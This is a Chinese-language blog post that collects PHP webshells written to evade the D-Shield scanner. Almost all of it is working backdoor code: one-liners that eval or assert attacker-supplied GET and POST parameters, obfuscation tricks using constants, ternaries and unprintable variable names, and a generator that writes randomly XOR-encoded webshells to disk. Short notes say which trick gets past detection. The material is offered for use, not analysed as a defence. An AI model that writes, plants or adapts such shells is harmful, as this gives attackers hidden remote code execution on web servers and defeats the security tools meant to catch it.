PHP Webshell Bypass

Share on:

准备写一个长期更新的免杀webshell总结

2019-10-12

一个符号bypass

https://forum.90sec.com/t/topic/513/1

1<?php
2function test($name){#
3    eval($name);
4}
5
6test($_GET['code']);
7?>

2019-08-15

https://evi1.cn/post/bypass-shell/

1<?php
2$a = $_POST['cmd'];
3$var = "phpnb {${eval($a)}}";

2019-08-12

20190812215816

2019-08-09

疯狂免杀

20190809144327

2019-08-07

1<?php
2function a()
3{
4    return '' + @$_POST['a'];
5}
6
7eval(a());

再来一个三元表达式的

20190807111622

2019-08-06

常量过D盾

https://secquan.org/Notes/1069997

1<?php
2sprintf("123");
3sprintf("123");
4sprintf("123");
5$a=$_GET['a'];
6define("Test", "$a",true);
7assert(TesT);
8?>

另一种思路反序列化过D盾,代码自己写

再一种思路 创建对象重复定义变量成员过D盾

2019-05-30

ASCII码显示不出来的字符做变量过D盾

https://github.com/th1k404/unishell

http://ascii.911cha.com/

1<?php
2if($_GET['␄']){
3    $␄=$_GET['␄'];
4    @preg_replace("/abcde/e",$␄, "abcdefg");
5}
6?>

可以自己修改

2019-05-21

https://github.com/yzddmr6/webshell-venom

利用随机异或无限免杀d盾

蚁剑插件版请移步:

https://github.com/yzddmr6/as_webshell_venom

 1<?php
 2//code by Mr6
 3error_reporting(0);
 4	function randomkeys($length)   
 5{   
 6   $pattern = '`[email protected]#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';  
 7    for($i=0;$i<$length;$i++)   
 8    {   
 9        $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)};    //生成php随机数   
10    }   
11    return $key;   
12}   
13	function randname($length)   
14{   
15   $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';  
16    for($i=0;$i<$length;$i++)   
17    {   
18        @$key.= $pattern{mt_rand(0,strlen($pattern)-1)};    //生成php随机数   
19    }   
20    return $key;   
21} 
22	$str=randomkeys(6); 
23	$bname=randname(4);
24	$lname=strrev(strtolower($bname));
25	$str2="assert";
26			echo "<?php \n";
27			echo "header('HTTP/1.1 404');\n";
28			echo "class  ".$bname."{ public \$c='';\nfunction __destruct(){\n";
29	for ($i=0;$i<6;$i++)
30	{
31		$name="_".$i;
32		$str3[$i]=bin2hex($str[$i] ^$str2[$i]);
33		echo "$"."$name=";
34	echo "'".$str[$i]."'"."^"."\"\\x".$str3[$i]."\";\n";
35	}
36	$aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;';
37	echo $aa;
38	echo "\n";
39	echo '@$db ("$this->c");}}';
40	echo "\n";
41	echo "\${$lname}=new {$bname}();\n";
42	echo "@\${$lname}->c=\$_POST['Mr6'];\n";
43	echo "?>\n";
44	@$file=$_GET['file'];
45	$html = ob_get_contents();
46	if (isset($file)){
47	if(file_put_contents($file,$html))
48	echo "\n\n\n".$file."   save success!";}
49	else {echo "Please input the file name like '?file=xxx.txt'";}
50	?>

2019-05-11

1<?php
2function a(){
3	return $a=$_POST['1'];
4}
5@assert(a());
6?>

1<?php
2$value=$key = "a";
3foreach($_POST as $key=>$value){
4	assert($value);
5}

可以发现的规律是当已经定义的变量和循环的变量名一致时,D盾就不是那么敏感了